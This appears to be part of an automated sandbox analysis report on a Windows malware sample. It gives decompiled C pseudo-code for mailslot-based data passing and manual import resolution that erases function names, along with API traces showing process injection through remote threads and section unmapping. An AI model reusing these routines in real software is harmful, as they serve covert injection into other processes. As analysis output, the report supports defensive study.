					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
